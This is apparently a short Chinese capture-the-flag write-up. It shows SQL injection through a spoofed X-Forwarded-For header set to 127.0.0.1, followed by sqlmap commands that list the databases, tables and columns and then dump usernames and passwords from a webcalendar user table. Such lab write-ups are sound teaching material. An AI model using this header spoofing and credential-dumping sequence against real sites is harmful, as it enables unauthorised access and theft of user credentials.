sqlmap注入

首先寻找注入点,题目给我们提示了X-Forwarded-for,说明题需要使用到。

我使用了Fiddler抓包或burpsuite,尝试随便输入一个账号密码,登录发现出来一个弹窗,在浏览器显示乱码了,但在抓包软件里能看到,很显然需要是内网本机才能登录。

这里给提交登录的POST请求头加上了 x-forwarded-for: 127.0.0.1

经过几轮测试,发现账号密码没有注入点而x-forwarded-for 存在sql注入点。



把提交的数据都写在一个txt文本文档里,导入sqlmap进行自动注入。

sqlmap -r a.txt -dbs -batch首先列出可用的数据库列表。

sqlmap -r a.txt -D webcalendar -tables -batch再看数据库有哪些表。

sqlmap -r a.txt -D webcalendar -T user -columns -batch再查看表的字段。

sqlmap -r a.txt -D webcalendar -T user -C username,password -dump -batch最后输出字段内容。

这道题考验我们的并不是x-Forwared-for的设置,而是存在sql注入点的利用。
评论 (0)